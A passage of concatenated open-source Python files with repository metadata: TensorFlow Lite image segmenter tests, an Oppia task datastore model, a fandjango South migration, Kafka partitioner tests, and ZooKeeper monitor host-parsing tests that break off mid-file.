"alnum_prop": 0.5271147508239289,
"repo_name": "carolFrohlich/nipype",
"id": "ebcd46c84ffce8633e56f439ffb389238c0043a8",
"size": "10054",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "nipype/workflows/dmri/fsl/dti.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9823"
},
{
"name": "KiCad",
"bytes": "3797"
},
{
"name": "Makefile",
"bytes": "2320"
},
{
"name": "Matlab",
"bytes": "1717"
},
{
"name": "Python",
"bytes": "5451077"
},
{
"name": "Shell",
"bytes": "3302"
},
{
"name": "Tcl",
"bytes": "43408"
}
],
"symlink_target": ""
}
|
"""Tests for image_segmenter."""
import enum
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from tensorflow_lite_support.python.task.core import base_options as base_options_module
from tensorflow_lite_support.python.task.processor.proto import segmentation_options_pb2
from tensorflow_lite_support.python.task.processor.proto import segmentations_pb2
from tensorflow_lite_support.python.task.vision import image_segmenter
from tensorflow_lite_support.python.task.vision.core import tensor_image
from tensorflow_lite_support.python.test import test_util
_BaseOptions = base_options_module.BaseOptions
_ColoredLabel = segmentations_pb2.ColoredLabel
_OutputType = segmentation_options_pb2.OutputType
_ImageSegmenter = image_segmenter.ImageSegmenter
_ImageSegmenterOptions = image_segmenter.ImageSegmenterOptions
_MODEL_FILE = 'deeplabv3.tflite'
_IMAGE_FILE = 'segmentation_input_rotation0.jpg'
_SEGMENTATION_FILE = 'segmentation_golden_rotation0.png'
_EXPECTED_COLORED_LABELS = [
_ColoredLabel(color=(0, 0, 0), category_name='background', display_name=''),
_ColoredLabel(
color=(128, 0, 0), category_name='aeroplane', display_name=''),
_ColoredLabel(color=(0, 128, 0), category_name='bicycle', display_name=''),
_ColoredLabel(color=(128, 128, 0), category_name='bird', display_name=''),
_ColoredLabel(color=(0, 0, 128), category_name='boat', display_name=''),
_ColoredLabel(color=(128, 0, 128), category_name='bottle', display_name=''),
_ColoredLabel(color=(0, 128, 128), category_name='bus', display_name=''),
_ColoredLabel(color=(128, 128, 128), category_name='car', display_name=''),
_ColoredLabel(color=(64, 0, 0), category_name='cat', display_name=''),
_ColoredLabel(color=(192, 0, 0), category_name='chair', display_name=''),
_ColoredLabel(color=(64, 128, 0), category_name='cow', display_name=''),
_ColoredLabel(
color=(192, 128, 0), category_name='dining table', display_name=''),
_ColoredLabel(color=(64, 0, 128), category_name='dog', display_name=''),
_ColoredLabel(color=(192, 0, 128), category_name='horse', display_name=''),
_ColoredLabel(
color=(64, 128, 128), category_name='motorbike', display_name=''),
_ColoredLabel(
color=(192, 128, 128), category_name='person', display_name=''),
_ColoredLabel(
color=(0, 64, 0), category_name='potted plant', display_name=''),
_ColoredLabel(color=(128, 64, 0), category_name='sheep', display_name=''),
_ColoredLabel(color=(0, 192, 0), category_name='sofa', display_name=''),
_ColoredLabel(color=(128, 192, 0), category_name='train', display_name=''),
_ColoredLabel(color=(0, 64, 128), category_name='tv', display_name='')
]
_MASK_MAGNIFICATION_FACTOR = 10
_MATCH_PIXELS_THRESHOLD = 0.01
def _create_segmenter_from_options(base_options, **segmentation_options):
segmentation_options = segmentation_options_pb2.SegmentationOptions(
**segmentation_options)
options = _ImageSegmenterOptions(
base_options=base_options, segmentation_options=segmentation_options)
segmenter = _ImageSegmenter.create_from_options(options)
return segmenter
class ModelFileType(enum.Enum):
FILE_CONTENT = 1
FILE_NAME = 2
class ImageSegmenterTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super().setUp()
self.test_image_path = test_util.get_test_data_path(_IMAGE_FILE)
self.test_seg_path = test_util.get_test_data_path(_SEGMENTATION_FILE)
self.model_path = test_util.get_test_data_path(_MODEL_FILE)
def test_create_from_file_succeeds_with_valid_model_path(self):
# Creates with default option and valid model file successfully.
segmenter = _ImageSegmenter.create_from_file(self.model_path)
self.assertIsInstance(segmenter, _ImageSegmenter)
def test_create_from_options_succeeds_with_valid_model_path(self):
# Creates with options containing model file successfully.
base_options = _BaseOptions(file_name=self.model_path)
options = _ImageSegmenterOptions(base_options=base_options)
segmenter = _ImageSegmenter.create_from_options(options)
self.assertIsInstance(segmenter, _ImageSegmenter)
def test_create_from_options_fails_with_invalid_model_path(self):
# Invalid empty model path.
with self.assertRaisesRegex(
ValueError,
r"ExternalFile must specify at least one of 'file_content', "
r"'file_name' or 'file_descriptor_meta'."):
base_options = _BaseOptions(file_name='')
options = _ImageSegmenterOptions(base_options=base_options)
_ImageSegmenter.create_from_options(options)
def test_create_from_options_succeeds_with_valid_model_content(self):
# Creates with options containing model content successfully.
with open(self.model_path, 'rb') as f:
base_options = _BaseOptions(file_content=f.read())
options = _ImageSegmenterOptions(base_options=base_options)
segmenter = _ImageSegmenter.create_from_options(options)
self.assertIsInstance(segmenter, _ImageSegmenter)
@parameterized.parameters(
(ModelFileType.FILE_NAME, _EXPECTED_COLORED_LABELS),
(ModelFileType.FILE_CONTENT, _EXPECTED_COLORED_LABELS))
def test_segment_model(self, model_file_type, expected_colored_labels):
# Creates segmenter.
if model_file_type is ModelFileType.FILE_NAME:
base_options = _BaseOptions(file_name=self.model_path)
elif model_file_type is ModelFileType.FILE_CONTENT:
with open(self.model_path, 'rb') as f:
model_content = f.read()
base_options = _BaseOptions(file_content=model_content)
else:
# Should never happen
raise ValueError('model_file_type is invalid.')
segmenter = _create_segmenter_from_options(base_options)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Performs image segmentation on the input.
segmentation = segmenter.segment(image).segmentations[0]
colored_labels = segmentation.colored_labels
# Comparing results.
self.assertEqual(colored_labels, expected_colored_labels,
'Colored labels do not match.')
def test_segmentation_category_mask(self):
"""Check if category mask matches with ground truth."""
# Creates segmenter.
base_options = _BaseOptions(file_name=self.model_path)
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CATEGORY_MASK)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Performs image segmentation on the input.
segmentation = segmenter.segment(image).segmentations[0]
result_pixels = segmentation.category_mask.flatten()
# Check if data type of `confidence_masks` are correct.
self.assertEqual(result_pixels.dtype, np.uint8)
# Loads ground truth segmentation file.
gt_segmentation = tensor_image.TensorImage.create_from_file(
self.test_seg_path)
gt_segmentation_array = gt_segmentation.buffer
gt_segmentation_shape = gt_segmentation_array.shape
num_pixels = gt_segmentation_shape[0] * gt_segmentation_shape[1]
ground_truth_pixels = gt_segmentation_array.flatten()
self.assertEqual(
len(result_pixels), len(ground_truth_pixels),
'Segmentation mask size does not match the ground truth mask size.')
inconsistent_pixels = 0
for index in range(num_pixels):
inconsistent_pixels += (
result_pixels[index] * _MASK_MAGNIFICATION_FACTOR !=
ground_truth_pixels[index])
self.assertLessEqual(
inconsistent_pixels / num_pixels, _MATCH_PIXELS_THRESHOLD,
f'Number of pixels in the candidate mask differing from that of the '
f'ground truth mask exceeds {_MATCH_PIXELS_THRESHOLD}.')
def test_segmentation_confidence_mask_matches_category_mask(self):
"""Check if the confidence mask matches with the category mask."""
# Create BaseOptions from model file.
base_options = _BaseOptions(file_name=self.model_path)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Run segmentation on the model in CATEGORY_MASK mode.
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CATEGORY_MASK)
# Performs image segmentation on the input and gets the category mask.
segmentation = segmenter.segment(image).segmentations[0]
category_mask = segmentation.category_mask
# Run segmentation on the model in CONFIDENCE_MASK mode.
segmenter = _create_segmenter_from_options(
base_options, output_type=_OutputType.CONFIDENCE_MASK)
# Performs image segmentation on the input again.
segmentation = segmenter.segment(image).segmentations[0]
# Gets the list of confidence masks and colored_labels.
confidence_masks = segmentation.confidence_masks
colored_labels = segmentation.colored_labels
# Check if confidence mask shape is correct.
self.assertEqual(
len(confidence_masks), len(colored_labels),
'Number of confidence masks must match with number of categories.')
# Gather the confidence masks in a single array `confidence_mask_array`.
confidence_mask_array = np.array(
[confidence_mask.value for confidence_mask in confidence_masks])
# Check if data type of `confidence_masks` are correct.
self.assertEqual(confidence_mask_array.dtype, np.float)
# Compute the category mask from the created confidence mask.
calculated_category_mask = np.argmax(confidence_mask_array, axis=0)
self.assertListEqual(
calculated_category_mask.tolist(), category_mask.tolist(),
'Confidence mask does not match with the category mask.')
if __name__ == '__main__':
tf.test.main()
|
{
"content_hash": "a85b4be87c2896292810d7021c24f2e6",
"timestamp": "",
"source": "github",
"line_count": 224,
"max_line_length": 88,
"avg_line_length": 43.69642857142857,
"alnum_prop": 0.7155700858193706,
"repo_name": "chromium/chromium",
"id": "3b0a01e1b135809e88eb573bdbc15b49ae373709",
"size": "10396",
"binary": false,
"copies": "9",
"ref": "refs/heads/main",
"path": "third_party/tflite_support/src/tensorflow_lite_support/python/test/task/vision/image_segmenter_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Models related to Oppia improvement tasks."""
from __future__ import annotations
from core.constants import constants
from core.platform import models
from typing import Dict, List, Optional
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import base_models
from mypy_imports import datastore_services
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
datastore_services = models.Registry.import_datastore_services()
TASK_ENTITY_TYPE_EXPLORATION = constants.TASK_ENTITY_TYPE_EXPLORATION
TASK_ENTITY_TYPES = (
TASK_ENTITY_TYPE_EXPLORATION,
)
TASK_STATUS_OPEN = constants.TASK_STATUS_OPEN
TASK_STATUS_OBSOLETE = constants.TASK_STATUS_OBSOLETE
TASK_STATUS_RESOLVED = constants.TASK_STATUS_RESOLVED
TASK_STATUS_CHOICES = (
TASK_STATUS_OPEN,
TASK_STATUS_OBSOLETE,
TASK_STATUS_RESOLVED,
)
TASK_TARGET_TYPE_STATE = constants.TASK_TARGET_TYPE_STATE
TASK_TARGET_TYPES = (
TASK_TARGET_TYPE_STATE,
)
TASK_TYPE_HIGH_BOUNCE_RATE = constants.TASK_TYPE_HIGH_BOUNCE_RATE
TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP = (
constants.TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP)
TASK_TYPE_NEEDS_GUIDING_RESPONSES = constants.TASK_TYPE_NEEDS_GUIDING_RESPONSES
TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS = (
constants.TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS)
TASK_TYPES = (
TASK_TYPE_HIGH_BOUNCE_RATE,
TASK_TYPE_INEFFECTIVE_FEEDBACK_LOOP,
TASK_TYPE_SUCCESSIVE_INCORRECT_ANSWERS,
TASK_TYPE_NEEDS_GUIDING_RESPONSES,
)
class TaskEntryModel(base_models.BaseModel):
"""Model representation of an actionable task from the improvements tab.
The ID of a task has the form: "[entity_type].[entity_id].[entity_version].
[task_type].[target_type].[target_id]".
"""
# Utility field which results in a 20% speedup compared to querying by each
# of the invididual fields used to compose it.
# Value has the form: "[entity_type].[entity_id].[entity_version]".
composite_entity_id = datastore_services.StringProperty(
required=True, indexed=True)
# The type of entity a task entry refers to.
entity_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_ENTITY_TYPES)
# The ID of the entity a task entry refers to.
entity_id = datastore_services.StringProperty(
required=True, indexed=True)
# The version of the entity a task entry refers to.
entity_version = datastore_services.IntegerProperty(
required=True, indexed=True)
# The type of task a task entry tracks.
task_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_TYPES)
# The type of sub-entity a task entry focuses on. Value is None when an
# entity does not have any meaningful sub-entities to target.
target_type = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_TARGET_TYPES)
# Uniquely identifies the sub-entity a task entry focuses on. Value is None
# when an entity does not have any meaningful sub-entities to target.
target_id = datastore_services.StringProperty(
required=True, indexed=True)
# A sentence generated by Oppia to describe why the task was created.
issue_description = datastore_services.StringProperty(
default=None, required=False, indexed=True)
# Tracks the state/progress of a task entry.
status = datastore_services.StringProperty(
required=True, indexed=True, choices=TASK_STATUS_CHOICES)
# ID of the user who closed the task, if any.
resolver_id = datastore_services.StringProperty(
default=None, required=False, indexed=True)
# The date and time at which a task was closed or deprecated.
resolved_on = datastore_services.DateTimeProperty(
default=None, required=False, indexed=True)
@classmethod
def has_reference_to_user_id(cls, user_id: str) -> bool:
"""Check whether any TaskEntryModel references the given user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.resolver_id == user_id).get() is not None
@staticmethod
def get_deletion_policy() -> base_models.DELETION_POLICY:
"""Model contains data to delete corresponding to a user:
resolver_id field.
It is okay to delete task entries since, after they are resolved, they
only act as a historical record. The removal just removes the historical
record.
"""
return base_models.DELETION_POLICY.DELETE
@classmethod
def apply_deletion_policy(cls, user_id: str) -> None:
"""Delete instances of TaskEntryModel for the user.
Args:
user_id: str. The ID of the user whose data should be deleted.
"""
task_entry_keys = (
cls.query(cls.resolver_id == user_id).fetch(keys_only=True))
datastore_services.delete_multi(task_entry_keys)
@staticmethod
def get_model_association_to_user(
) -> base_models.MODEL_ASSOCIATION_TO_USER:
"""Model is exported as one instance shared across users since multiple
users resolve tasks.
"""
return (
base_models
.MODEL_ASSOCIATION_TO_USER
.ONE_INSTANCE_SHARED_ACROSS_USERS)
@classmethod
def get_export_policy(cls) -> Dict[str, base_models.EXPORT_POLICY]:
"""Model contains data to export corresponding to a user:
TaskEntryModel contains the ID of the user that acted on a task.
"""
return dict(super(cls, cls).get_export_policy(), **{
'composite_entity_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'entity_version': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'task_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'target_type': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'target_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'issue_description': base_models.EXPORT_POLICY.EXPORTED,
'status': base_models.EXPORT_POLICY.EXPORTED,
'resolver_id': base_models.EXPORT_POLICY.EXPORTED,
'resolved_on': base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def get_field_name_mapping_to_takeout_keys(cls) -> Dict[str, str]:
"""Defines the mapping of field names to takeout keys since this model
is exported as one instance shared across users.
"""
return {
'resolver_id': 'task_ids_resolved_by_user',
'issue_description': 'issue_descriptions',
'status': 'statuses',
'resolved_on': 'resolution_msecs'
}
@staticmethod
def export_data(user_id: str) -> Dict[str, List[str]]:
"""Returns the user-relevant properties of TaskEntryModels.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. The user-relevant properties of TaskEntryModel in a dict
format. In this case, we are returning all the ids of the tasks
which were closed by this user.
"""
task_ids_resolved_by_user = TaskEntryModel.query(
TaskEntryModel.resolver_id == user_id)
return {
'task_ids_resolved_by_user': (
[t.id for t in task_ids_resolved_by_user]),
'issue_descriptions': (
[t.issue_description for t in task_ids_resolved_by_user]),
'statuses': (
[t.status for t in task_ids_resolved_by_user]),
'resolution_msecs': (
[t.resolved_on for t in task_ids_resolved_by_user]),
}
@classmethod
def generate_task_id(
cls,
entity_type: str,
entity_id: str,
entity_version: int,
task_type: str,
target_type: str,
target_id: str
) -> str:
"""Generates a new task entry ID.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
task_type: str. The type of task a task entry tracks.
target_type: str. The type of sub-entity a task entry refers to.
target_id: str. The ID of the sub-entity a task entry refers to.
Returns:
str. The ID for the given task.
"""
return '%s.%s.%d.%s.%s.%s' % (
entity_type, entity_id, entity_version, task_type, target_type,
target_id)
@classmethod
def generate_composite_entity_id(
cls,
entity_type: str,
entity_id: str,
entity_version: int
) -> str:
"""Generates a new composite_entity_id value.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
Returns:
str. The composite_entity_id for the given task.
"""
return '%s.%s.%d' % (entity_type, entity_id, entity_version)
@classmethod
def create(
cls,
entity_type: str,
entity_id: str,
entity_version: int,
task_type: str,
target_type: str,
target_id: str,
issue_description: Optional[str] = None,
status: str = TASK_STATUS_OBSOLETE,
resolver_id: Optional[str] = None,
resolved_on: Optional[str] = None
) -> str:
"""Creates a new task entry and puts it in storage.
Args:
entity_type: str. The type of entity a task entry refers to.
entity_id: str. The ID of the entity a task entry refers to.
entity_version: int. The version of the entity a task entry refers
to.
task_type: str. The type of task a task entry tracks.
target_type: str. The type of sub-entity a task entry refers to.
target_id: str. The ID of the sub-entity a task entry refers to.
issue_description: str. Sentence generated by Oppia to describe why
the task was created.
status: str. Tracks the state/progress of a task entry.
resolver_id: str. ID of the user who closed the task, if any.
resolved_on: str. The date and time at which a task was closed or
deprecated.
Returns:
str. The ID of the new task.
Raises:
Exception. A task corresponding to the provided identifier values
(entity_type, entity_id, entity_version, task_type, target_type,
target_id) already exists in storage.
"""
task_id = cls.generate_task_id(
entity_type, entity_id, entity_version, task_type, target_type,
target_id)
if cls.get_by_id(task_id) is not None:
raise Exception('Task id %s already exists' % task_id)
composite_entity_id = cls.generate_composite_entity_id(
entity_type, entity_id, entity_version)
task_entry = cls(
id=task_id,
composite_entity_id=composite_entity_id,
entity_type=entity_type,
entity_id=entity_id,
entity_version=entity_version,
task_type=task_type,
target_type=target_type,
target_id=target_id,
issue_description=issue_description,
status=status,
resolver_id=resolver_id,
resolved_on=resolved_on)
task_entry.update_timestamps()
task_entry.put()
return task_id
|
{
"content_hash": "2f8ae08b1b6c571954091470ee493ce5",
"timestamp": "",
"source": "github",
"line_count": 309,
"max_line_length": 80,
"avg_line_length": 39.271844660194176,
"alnum_prop": 0.6260403790688093,
"repo_name": "kevinlee12/oppia",
"id": "dc71ac16464fb4f2f2468ad306d85364fa0495a1",
"size": "12758",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "core/storage/improvements/gae_models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "205771"
},
{
"name": "HTML",
"bytes": "1835761"
},
{
"name": "JavaScript",
"bytes": "1182599"
},
{
"name": "PEG.js",
"bytes": "71377"
},
{
"name": "Python",
"bytes": "13670639"
},
{
"name": "Shell",
"bytes": "2239"
},
{
"name": "TypeScript",
"bytes": "13024194"
}
],
"symlink_target": ""
}
|
"""
This module holds a wsgi server and future web-related code.
"""
|
{
"content_hash": "7bd862bca9821fe8055518e72e480715",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 60,
"avg_line_length": 24,
"alnum_prop": 0.6805555555555556,
"repo_name": "ionelmc/python-cogen",
"id": "e4bfb67aac754164137851c62bf9b3407fa28601",
"size": "72",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "cogen/web/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "34085"
},
{
"name": "CSS",
"bytes": "1481"
},
{
"name": "HTML",
"bytes": "34029"
},
{
"name": "JavaScript",
"bytes": "206112"
},
{
"name": "Mako",
"bytes": "1292"
},
{
"name": "Python",
"bytes": "341182"
},
{
"name": "Shell",
"bytes": "184"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'User.verified'
db.alter_column('fandjango_user', 'verified', self.gf('django.db.models.fields.NullBooleanField')(null=True))
def backwards(self, orm):
# Changing field 'User.verified'
db.alter_column('fandjango_user', 'verified', self.gf('django.db.models.fields.BooleanField')())
models = {
'fandjango.oauthtoken': {
'Meta': {'object_name': 'OAuthToken'},
'expires_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued_at': ('django.db.models.fields.DateTimeField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'fandjango.user': {
'Meta': {'object_name': 'User'},
'authorized': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {}),
'facebook_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hometown': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'last_seen_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'oauth_token': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fandjango.OAuthToken']", 'unique': 'True'}),
'political_views': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'relationship_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'verified': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['fandjango']
|
{
"content_hash": "fa495abe9f3c1e5549a57bb453cd379d",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 138,
"avg_line_length": 65.9074074074074,
"alnum_prop": 0.5580219162686147,
"repo_name": "jgorset/fandjango",
"id": "185a027fcd972e552900d26c471e47e7ef190873",
"size": "3577",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fandjango/migrations/0004_auto__chg_field_user_verified.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "884"
},
{
"name": "Makefile",
"bytes": "112"
},
{
"name": "Python",
"bytes": "95704"
}
],
"symlink_target": ""
}
|
from flask import Blueprint
wechat = Blueprint('wechat', __name__)
from . import views
|
{
"content_hash": "12475ca88a5be7669727b2fb704a9b2b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 38,
"avg_line_length": 17.6,
"alnum_prop": 0.7272727272727273,
"repo_name": "archever/archever_me",
"id": "33cbaf4368049f10e772de18841a8422870b64cd",
"size": "89",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/wechat/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13724"
}
],
"symlink_target": ""
}
|
import six
from . import unittest
from kafka.partitioner import (Murmur2Partitioner)
class TestMurmurPartitioner(unittest.TestCase):
def test_hash_bytes(self):
p = Murmur2Partitioner(range(1000))
self.assertEqual(p.partition(bytearray(b'test')), p.partition(b'test'))
def test_hash_encoding(self):
p = Murmur2Partitioner(range(1000))
self.assertEqual(p.partition('test'), p.partition(u'test'))
def test_murmur2_java_compatibility(self):
p = Murmur2Partitioner(range(1000))
# compare with output from Kafka's org.apache.kafka.clients.producer.Partitioner
self.assertEqual(681, p.partition(b''))
self.assertEqual(524, p.partition(b'a'))
self.assertEqual(434, p.partition(b'ab'))
self.assertEqual(107, p.partition(b'abc'))
self.assertEqual(566, p.partition(b'123456789'))
self.assertEqual(742, p.partition(b'\x00 '))
|
{
"content_hash": "1e1887f9bfad52ef666075a845fed61f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 88,
"avg_line_length": 40.26086956521739,
"alnum_prop": 0.6825053995680346,
"repo_name": "gamechanger/kafka-python",
"id": "67cd83bc4114ee0f18946e74b17e2b0fb0121406",
"size": "926",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_partitioner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "559844"
},
{
"name": "Shell",
"bytes": "2646"
}
],
"symlink_target": ""
}
|
import socket
import sys
import time
from functools import partial
from tornado import gen
from tornado.testing import AsyncTestCase, gen_test
from zookeeper_monitor import zk
from .fixtures import host as FIXTURE
try:
from unittest.mock import call, patch, Mock, MagicMock
except:
from mock import call, patch, Mock, MagicMock
class HostTest(AsyncTestCase):
def setUp(self):
super(HostTest, self).setUp()
self.maxDiff = None
def tearDown(self):
patch.stopall()
super(HostTest, self).tearDown()
def test_parse_info_ok(self):
for case in FIXTURE.parse_info_data['ok']:
host = zk.Host('localhost', 2181)
ret = host._parse_info(case['in'])
for attr, val in case['out'].items():
self.assertEqual(host.info[attr], val)
self.assertEqual(ret[attr], val)
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_info_ok_wo_update(self):
for case in FIXTURE.parse_info_data['ok']:
host = zk.Host('localhost', 2181)
ret = host._parse_info(case['in'], update_host_info=False)
for attr, val in case['out'].items():
self.assertFalse(attr in host.info and host.info[attr])
self.assertEqual(ret[attr], val)
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
def test_parse_info_err_parse(self):
for case in FIXTURE.parse_info_data['raise_on_parse']:
host = zk.Host('localhost', 2181)
host.is_valid = MagicMock(return_value=True)
self.assertRaises(zk.HostInvalidInfo, partial(host._parse_info, case['in']))
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
host.is_valid.assert_called_once()
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_info_err_validate(self):
for case in FIXTURE.parse_info_data['raise_on_validate']:
host = zk.Host('localhost', 2181)
self.assertRaises(zk.HostInvalidInfo, partial(host._parse_info, case['in']))
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_stat(self):
for name, case in FIXTURE.parse_stat_data.items():
host = zk.Host('localhost', 2181)
print('CASE %s', name)
parsed, not_parsed, errors = host._parse_stat(case['in'])
self.assertEqual(parsed, case['parsed'])
self.assertEqual(not_parsed, case['not_parsed'])
def test_parse_stat_error(self):
re_obj = MagicMock()
match_obj = Mock()
re_obj.search = MagicMock(return_value=match_obj)
patch('zookeeper_monitor.zk.host.re', re_obj).start()
keyerror = MagicMock(return_value={'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 6})
too_few = MagicMock(return_value=[1,2,3,4])
too_many = MagicMock(return_value=[1,2,3,4,5,6,7])
case = FIXTURE.parse_stat_data['ok']
for groups_mock in [keyerror, too_few, too_many]:
match_obj.groups = groups_mock
host = zk.Host('localhost', 2181)
parsed, not_parsed, errors = host._parse_stat(case['in'])
self.assertNotEqual(parsed, case['parsed'])
self.assertEqual(not_parsed, [])
proper = dict(case['parsed'])
proper['clients'] = []
self.assertEqual(parsed, proper)
self.assertEqual(
errors, [el.strip() for el in case['in'] if not el.startswith('Zookeeper')])
def test_init_default(self):
host = zk.Host('localhost')
self.assertEqual(host.addr, 'localhost')
self.assertEqual(host.port, 2181)
self.assertEqual(host.dc, None)
self.assertEqual(host.cluster, None)
self.assertIsInstance(host.timeout, int)
self.assertEqual(host.info['zxid'], None)
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
self.assertEqual(host.health, zk.Host.HOST_UNCHECKED)
def test_init(self):
host = zk.Host('dummy', port=9999, cluster='FAKE', dc='eu-west')
self.assertEqual(host.addr, 'dummy')
self.assertEqual(host.port, 9999)
self.assertEqual(host.dc, 'eu-west')
self.assertEqual(host.cluster, 'FAKE')
self.assertEqual(host.info['zxid'], None)
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
self.assertEqual(host.health, zk.Host.HOST_UNCHECKED)
def test_init_err_no_addr(self):
self.assertRaises(TypeError, partial(zk.Host, port=9999, dc='eu-west'))
def _prepare_executes_mock(self, ip='127.0.0.1', **kwargs):
iostream_obj = MagicMock()
for attr, val in kwargs.items():
mock = val if (isinstance(val, Mock) or hasattr(val, '__call__')) else MagicMock(return_value=val)
setattr(iostream_obj, attr, mock)
iostream = MagicMock(return_value=iostream_obj)
resolver = MagicMock(
return_value=gen.maybe_future((socket.AF_INET, ip))
)
patch('zookeeper_monitor.zk.host.Host._resolve', resolver).start()
patch('zookeeper_monitor.zk.host.socket.socket', MagicMock).start()
patch('zookeeper_monitor.zk.host.IOStream', iostream).start()
patch('zookeeper_monitor.zk.host.IOLoop', self.io_loop).start()
return resolver, iostream, iostream_obj
@gen_test
def test_execute(self):
some_data = 'DATA'
some_ip = '123.45.67.89',
resolver, iostream, iostream_obj = self._prepare_executes_mock(
ip=some_ip,
connect=None,
#write=lambda a, callback: callback(None),
write=MagicMock(side_effect=lambda a, callback: callback(None)),
read_until_close=lambda callback: callback(some_data)
)
host = zk.Host('localhost', 2181)
ret_test = yield host.execute('sample_command')
self.assertEqual(ret_test, some_data)
